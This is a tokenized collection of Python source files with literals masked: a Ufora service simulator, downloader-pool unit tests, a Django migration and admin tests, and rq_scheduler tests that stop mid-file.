fakeAwsBaseDir <EOL> if useUniqueFakeAwsDir : <EOL> newDirName = makeUniqueDir ( ) <EOL> fakeAwsBase = Setup . config ( ) . fakeAwsBaseDir <EOL> Setup . config ( ) . fakeAwsBaseDir = newDirName <EOL> latestLinkPath = os . path . join ( fakeAwsBase , '<STR_LIT>' ) <EOL> if os . path . exists ( latestLinkPath ) : <EOL> os . unlink ( latestLinkPath ) <EOL> os . symlink ( newDirName , latestLinkPath ) <EOL> assert Simulator . _globalSimulator is None <EOL> Simulator . _globalSimulator = Simulator ( ) <EOL> return Simulator . _globalSimulator <EOL> def createCumulusGateway ( self , callbackScheduler , vdm = None ) : <EOL> if vdm is None : <EOL> vdm = VectorDataManager . constructVDM ( callbackScheduler ) <EOL> vdm . setDropUnreferencedPagesWhenFull ( True ) <EOL> viewFactory = self . getViewFactory ( ) <EOL> return CumulusGatewayRemote . RemoteGateway ( <EOL> self . callbackScheduler , <EOL> vdm , <EOL> TcpChannelFactory . TcpStringChannelFactory ( self . callbackScheduler ) , <EOL> CumulusActiveMachines . CumulusActiveMachines ( viewFactory ) , <EOL> viewFactory <EOL> ) <EOL> def verifySharedStateRunning ( self , timeout = <NUM_LIT> ) : <EOL> t0 = time . time ( ) <EOL> while True : <EOL> try : <EOL> self . getViewFactory ( ) . createView ( ) <EOL> return <EOL> except : <EOL> if time . time ( ) - t0 >= timeout : <EOL> traceback . print_exc ( ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def getViewFactory ( self ) : <EOL> return ViewFactory . ViewFactory . TcpViewFactory ( self . callbackScheduler , <EOL> '<STR_LIT:localhost>' , <EOL> self . sharedStatePort ) <EOL> def startService ( self ) : <EOL> self . stopRelay ( ) <EOL> self . stopGatewayService ( ) <EOL> self . stopSharedState ( ) <EOL> KillProcessHoldingPort . killProcessGroupHoldingPorts ( <EOL> Setup . config ( ) . basePort , <EOL> Setup . config ( ) . basePort + Setup . config ( ) . numPorts <EOL> ) <EOL> self . createSimulationDirectory ( ) <EOL> self . 
startSharedState ( ) <EOL> try : <EOL> self . startGatewayService ( ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> with DirectoryScope . DirectoryScope ( self . webPath ) : <EOL> self . startRelayProcess ( self . relayScript ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . verifySharedStateRunning ( ) <EOL> self . desirePublisher = WorkerProcesses ( <EOL> os . path . join ( self . uforaPath , '<STR_LIT>' ) <EOL> ) <EOL> except : <EOL> logging . error ( <EOL> "<STR_LIT>" , <EOL> traceback . format_exc ( ) <EOL> ) <EOL> self . dumpRelayLogs ( ) <EOL> raise <EOL> def startSharedState ( self ) : <EOL> cacheDir = Setup . config ( ) . getConfigValue ( <EOL> "<STR_LIT>" , <EOL> os . path . join ( Setup . config ( ) . fakeAwsBaseDir , '<STR_LIT>' ) <EOL> ) <EOL> logging . info ( "<STR_LIT>" , <EOL> cacheDir , <EOL> self . sharedStateLogFile ) <EOL> with DirectoryScope . DirectoryScope ( self . sharedStatePath ) : <EOL> args = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . sharedStateLogFile , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , self . sharedStateMainline , <EOL> '<STR_LIT>' , cacheDir , <EOL> '<STR_LIT>' , '<STR_LIT:info>' <EOL> ] <EOL> def sharedStateStdout ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> def sharedStateStderr ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> startSharedState = SubprocessRunner . SubprocessRunner ( <EOL> args , <EOL> sharedStateStdout , <EOL> sharedStateStderr , <EOL> dict ( os . environ ) <EOL> ) <EOL> startSharedState . start ( ) <EOL> startSharedState . wait ( <NUM_LIT> ) <EOL> startSharedState . stop ( ) <EOL> def stopSharedState ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . sharedStateMainline ) <EOL> def restartSharedState ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . restartForeverProcess ( self . 
sharedStateMainline ) <EOL> def startGatewayService ( self ) : <EOL> args = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . gatewayLogFile , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , self . gatewayServiceMainline , <EOL> '<STR_LIT>' , '<STR_LIT:test>' ] <EOL> def gatewayStdout ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> def gatewayStderr ( msg ) : <EOL> logging . info ( "<STR_LIT>" , msg ) <EOL> gatewayProc = SubprocessRunner . SubprocessRunner ( <EOL> args , <EOL> gatewayStdout , <EOL> gatewayStderr , <EOL> dict ( os . environ ) <EOL> ) <EOL> gatewayProc . start ( ) <EOL> gatewayProc . wait ( <NUM_LIT> ) <EOL> gatewayProc . stop ( ) <EOL> def stopGatewayService ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . gatewayServiceMainline ) <EOL> def stopRelay ( self ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> self . stopForeverProcess ( self . relayScript ) <EOL> def runForeverCommand ( self , script , foreverCommand , timeout = <NUM_LIT> ) : <EOL> result = [ ] <EOL> self . processPool . getDownloader ( ) . executeAndCallbackWithString ( <EOL> RunForeverCommand ( foreverCommand , script , dict ( os . environ ) , timeout ) , <EOL> result . append <EOL> ) <EOL> for line in result [ <NUM_LIT:0> ] . split ( "<STR_LIT:\n>" ) : <EOL> logging . info ( line ) <EOL> def stopForeverProcess ( self , script , timeout = <NUM_LIT> ) : <EOL> self . runForeverCommand ( script , '<STR_LIT>' , timeout ) <EOL> def restartForeverProcess ( self , script , timeout = <NUM_LIT> ) : <EOL> self . runForeverCommand ( script , '<STR_LIT>' , timeout ) <EOL> def startRelayProcess ( self , relayScript ) : <EOL> tries = <NUM_LIT:0> <EOL> while tries < <NUM_LIT:5> : <EOL> hasStartedEvent = self . tryToStartRelayProcess ( relayScript ) <EOL> hasStartedEvent . wait ( <NUM_LIT> ) <EOL> if hasStartedEvent . isSet ( ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> return <EOL> logging . 
warn ( "<STR_LIT>" ) <EOL> tries = tries + <NUM_LIT:1> <EOL> self . stopRelay ( ) <EOL> assert False , "<STR_LIT>" <EOL> def tryToStartRelayProcess ( self , relayScript ) : <EOL> env = dict ( os . environ ) <EOL> env [ '<STR_LIT>' ] = '<STR_LIT:test>' <EOL> hasStartedEvent = threading . Event ( ) <EOL> def onStdOut ( msg ) : <EOL> hasStartedEvent . set ( ) <EOL> logging . critical ( "<STR_LIT>" , msg ) <EOL> def onStdErr ( msg ) : <EOL> logging . critical ( "<STR_LIT>" , msg ) <EOL> coffeeCommand = '<STR_LIT>' <EOL> if '<STR_LIT>' in os . environ : <EOL> coffeeCommand = '<STR_LIT>' <EOL> nodejsOptions = [ ] <EOL> if '<STR_LIT>' in os . environ : <EOL> nodejsOptions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> args = [ relayScript , <EOL> '<STR_LIT>' , str ( self . relayPort ) , <EOL> '<STR_LIT>' , str ( self . subscribableWebObjectsPort ) ] <EOL> command = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , self . relayLogFile , <EOL> '<STR_LIT>' , self . webPath , <EOL> '<STR_LIT:start>' , <EOL> '<STR_LIT:-c>' , coffeeCommand ] + nodejsOptions + args <EOL> SubprocessRunner . SubprocessRunner ( command , onStdOut , onStdErr , env ) . start ( ) <EOL> return hasStartedEvent <EOL> def getDesirePublisher ( self ) : <EOL> assert self . desirePublisher , "<STR_LIT>" <EOL> return self . desirePublisher <EOL> @ staticmethod <EOL> def createSimulationDirectory ( ) : <EOL> if not os . path . exists ( Setup . config ( ) . fakeAwsBaseDir ) : <EOL> os . makedirs ( Setup . config ( ) . fakeAwsBaseDir ) <EOL> def stopService ( self ) : <EOL> self . stopGatewayService ( ) <EOL> self . stopSharedState ( ) <EOL> if self . desirePublisher : <EOL> self . desirePublisher . stopService ( ) <EOL> if self . _connectionManager : <EOL> self . _connectionManager . close ( ) <EOL> assert Simulator . _globalSimulator is not None <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . stopRelay ( ) <EOL> Simulator . _globalSimulator = None <EOL> Setup . config ( ) . fakeAwsBaseDir = Simulator . 
_originalFakeAwsDir <EOL> self . processPool . teardown ( ) </s>
<s> import unittest <EOL> import ufora . util . OutOfProcessDownloader as OutOfProcessDownloader <EOL> import ufora . config . Mainline as Mainline <EOL> import ufora . distributed . util . common as common <EOL> import Queue <EOL> import time <EOL> import logging <EOL> import os <EOL> def returnsAString ( ) : <EOL> return "<STR_LIT>" <EOL> def assertsFalse ( ) : <EOL> assert False <EOL> def echoInput ( toEcho ) : <EOL> return toEcho <EOL> class DoublesString : <EOL> def __init__ ( self , x ) : <EOL> self . x = x <EOL> def __call__ ( self ) : <EOL> return self . x + self . x <EOL> class OutOfProcessDownloaderTestCases : <EOL> def test_basic ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> pool . teardown ( ) <EOL> def test_in_process ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> , actuallyRunOutOfProcess = False ) <EOL> queue = Queue . Queue ( ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( returnsAString , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( "<STR_LIT>" ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . teardown ( ) <EOL> def test_execute ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( returnsAString , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( "<STR_LIT>" ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , "<STR_LIT>" ) <EOL> pool . teardown ( ) <EOL> def test_throughput ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> t0 = time . 
time ( ) <EOL> ix = <NUM_LIT:0> <EOL> while time . time ( ) - t0 < <NUM_LIT> : <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( DoublesString ( str ( ix ) ) , queue . put ) <EOL> self . assertEqual ( queue . get ( ) , str ( ix ) * <NUM_LIT:2> ) <EOL> ix = ix + <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" , ix / <NUM_LIT> ) <EOL> self . assertTrue ( ix > <NUM_LIT:100> ) <EOL> pool . teardown ( ) <EOL> def test_exception ( self ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> ) <EOL> queue = Queue . Queue ( ) <EOL> with self . assertRaises ( AssertionError ) : <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( assertsFalse , queue . put ) <EOL> pool . teardown ( ) <EOL> def test_callable_with_input ( self ) : <EOL> self . verifyCallableWithInput ( ) <EOL> def test_callable_with_input_in_proc ( self ) : <EOL> self . verifyCallableWithInput ( actuallyRunOutOfProcess = False ) <EOL> def verifyCallableWithInput ( self , actuallyRunOutOfProcess = True ) : <EOL> pool = OutOfProcessDownloader . OutOfProcessDownloaderPool ( <NUM_LIT:1> , actuallyRunOutOfProcess ) <EOL> try : <EOL> queue = Queue . Queue ( ) <EOL> toEcho = "<STR_LIT:x>" * <NUM_LIT> <EOL> def writeInput ( fd ) : <EOL> os . write ( fd , common . prependSize ( toEcho ) ) <EOL> pool . getDownloader ( ) . executeAndCallbackWithString ( echoInput , queue . put , writeInput ) <EOL> self . assertEqual ( queue . get ( ) , toEcho ) <EOL> finally : <EOL> pool . teardown ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT:email>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( blank = True , max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( blank = True , choices = [ ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT:id>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , 
( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) ] , default = '<STR_LIT>' , help_text = '<STR_LIT>' , max_length = <NUM_LIT:12> ) , <EOL> ) , <EOL> ] </s>
<s> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . test . client import Client <EOL> from django . test import TestCase <EOL> from post_office import mail <EOL> from post_office . models import Email <EOL> admin_username = '<STR_LIT>' <EOL> admin_email = '<STR_LIT>' <EOL> admin_pass = '<STR_LIT>' <EOL> class AdminViewTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> user = User . objects . create_superuser ( admin_username , admin_email , admin_pass ) <EOL> self . client = Client ( ) <EOL> self . client . login ( username = user . username , password = admin_pass ) <EOL> def test_admin_interface ( self ) : <EOL> response = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_admin_change_page ( self ) : <EOL> """<STR_LIT>""" <EOL> mail . send ( recipients = [ '<STR_LIT>' ] , headers = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> email = Email . objects . latest ( '<STR_LIT:id>' ) <EOL> response = self . client . get ( reverse ( '<STR_LIT>' , args = [ email . id ] ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) </s>
<s> import unittest <EOL> from datetime import datetime , timedelta <EOL> import os <EOL> import signal <EOL> import time <EOL> from threading import Thread <EOL> from rq import Queue <EOL> from rq . compat import as_text <EOL> from rq . job import Job <EOL> import warnings <EOL> from rq_scheduler import Scheduler <EOL> from rq_scheduler . utils import to_unix , from_unix , get_next_scheduled_time <EOL> from tests import RQTestCase <EOL> def say_hello ( name = None ) : <EOL> """<STR_LIT>""" <EOL> if name is None : <EOL> name = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( name , ) <EOL> def tl ( l ) : <EOL> return [ as_text ( i ) for i in l ] <EOL> def simple_addition ( x , y , z ) : <EOL> return x + y + z <EOL> class TestScheduler ( RQTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestScheduler , self ) . setUp ( ) <EOL> self . scheduler = Scheduler ( connection = self . testconn ) <EOL> def test_birth_and_death_registration ( self ) : <EOL> """<STR_LIT>""" <EOL> key = Scheduler . scheduler_key <EOL> self . assertNotIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> scheduler = Scheduler ( connection = self . testconn , interval = <NUM_LIT:20> ) <EOL> scheduler . register_birth ( ) <EOL> self . assertIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> self . assertEqual ( self . testconn . ttl ( key ) , <NUM_LIT:30> ) <EOL> self . assertFalse ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> self . assertRaises ( ValueError , scheduler . register_birth ) <EOL> scheduler . register_death ( ) <EOL> self . assertTrue ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> def test_create_job ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job , job_from_queue ) <EOL> self . assertEqual ( job_from_queue . 
func , say_hello ) <EOL> def test_create_job_with_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , ttl = <NUM_LIT:2> , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( <NUM_LIT:2> , job_from_queue . ttl ) <EOL> def test_create_job_with_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , id = '<STR_LIT>' , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT>' , job_from_queue . id ) <EOL> def test_create_job_with_description ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , description = '<STR_LIT:description>' , args = ( ) , kwargs = { } ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT:description>' , job_from_queue . description ) <EOL> def test_job_not_persisted_if_commit_false ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . _create_job ( say_hello , commit = False ) <EOL> self . assertEqual ( self . testconn . hgetall ( job . key ) , { } ) <EOL> def test_create_scheduled_job ( self ) : <EOL> """<STR_LIT>""" <EOL> scheduled_time = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( scheduled_time , say_hello ) <EOL> self . assertEqual ( job , Job . fetch ( job . id , connection = self . testconn ) ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( scheduled_time ) ) <EOL> def test_enqueue_in ( self ) : <EOL> """<STR_LIT>""" <EOL> right_now = datetime . utcnow ( ) <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . 
enqueue_in ( time_delta , say_hello ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( right_now + time_delta ) ) <EOL> time_delta = timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , say_hello ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( right_now + time_delta ) ) <EOL> def test_get_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs ( now ) ) <EOL> future_time = now + timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_at ( future_time , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs ( timedelta ( hours = <NUM_LIT:1> , seconds = <NUM_LIT:1> ) ) ) <EOL> self . assertIn ( job , [ j [ <NUM_LIT:0> ] for j in self . scheduler . get_jobs ( with_times = True ) ] ) <EOL> self . assertIsInstance ( self . scheduler . get_jobs ( with_times = True ) [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , datetime ) <EOL> self . assertNotIn ( job , self . scheduler . get_jobs ( timedelta ( minutes = <NUM_LIT> , seconds = <NUM_LIT> ) ) ) <EOL> def test_get_jobs_to_queue ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> future_time = now + timedelta ( hours = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_at ( future_time , say_hello ) <EOL> self . assertNotIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> def test_enqueue_job ( self ) : <EOL> """<STR_LIT>""" <EOL> now = datetime . 
utcnow ( ) <EOL> queue_name = '<STR_LIT:foo>' <EOL> scheduler = Scheduler ( connection = self . testconn , queue_name = queue_name ) <EOL> job = scheduler . enqueue_at ( now , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job , tl ( self . testconn . zrange ( scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:10> ) ) ) <EOL> job = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertTrue ( job . enqueued_at is not None ) <EOL> queue = scheduler . get_queue_for_job ( job ) <EOL> self . assertIn ( job , queue . jobs ) <EOL> queue = Queue . from_queue_key ( '<STR_LIT>' . format ( queue_name ) ) <EOL> self . assertIn ( job , queue . jobs ) <EOL> self . assertIn ( queue , Queue . all ( ) ) <EOL> def test_job_membership ( self ) : <EOL> now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler ) <EOL> self . assertIn ( job . id , self . scheduler ) <EOL> self . assertNotIn ( "<STR_LIT>" , self . scheduler ) <EOL> def test_cancel_scheduled_job ( self ) : <EOL> """<STR_LIT>""" <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , say_hello ) <EOL> self . scheduler . cancel ( job ) <EOL> self . assertNotIn ( job . id , tl ( self . testconn . zrange ( <EOL> self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_change_execution_time ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , say_hello ) <EOL> new_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . scheduler . change_execution_time ( job , new_date ) <EOL> self . assertEqual ( to_unix ( new_date ) , <EOL> self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) ) <EOL> self . scheduler . cancel ( job ) <EOL> self . assertRaises ( ValueError , self . scheduler . 
change_execution_time , job , new_date ) <EOL> def test_args_kwargs_are_passed_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , z = <NUM_LIT:1> , y = <NUM_LIT:1> , x = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:x>' : <NUM_LIT:1> , '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> job = self . scheduler . enqueue_at ( datetime . utcnow ( ) , simple_addition , <NUM_LIT:1> , z = <NUM_LIT:1> , y = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , ) ) <EOL> time_delta = timedelta ( minutes = <NUM_LIT:1> ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , z = <NUM_LIT:1> , y = <NUM_LIT:1> , x = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:x>' : <NUM_LIT:1> , '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> job = self . scheduler . enqueue_in ( time_delta , simple_addition , <NUM_LIT:1> , z = <NUM_LIT:1> , y = <NUM_LIT:1> ) <EOL> self . assertEqual ( job . kwargs , { '<STR_LIT:y>' : <NUM_LIT:1> , '<STR_LIT:z>' : <NUM_LIT:1> } ) <EOL> self . assertEqual ( job . args , ( <NUM_LIT:1> , ) ) <EOL> def test_enqueue_is_deprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> job = self . scheduler . enqueue ( datetime . utcnow ( ) , say_hello ) <EOL> self . 
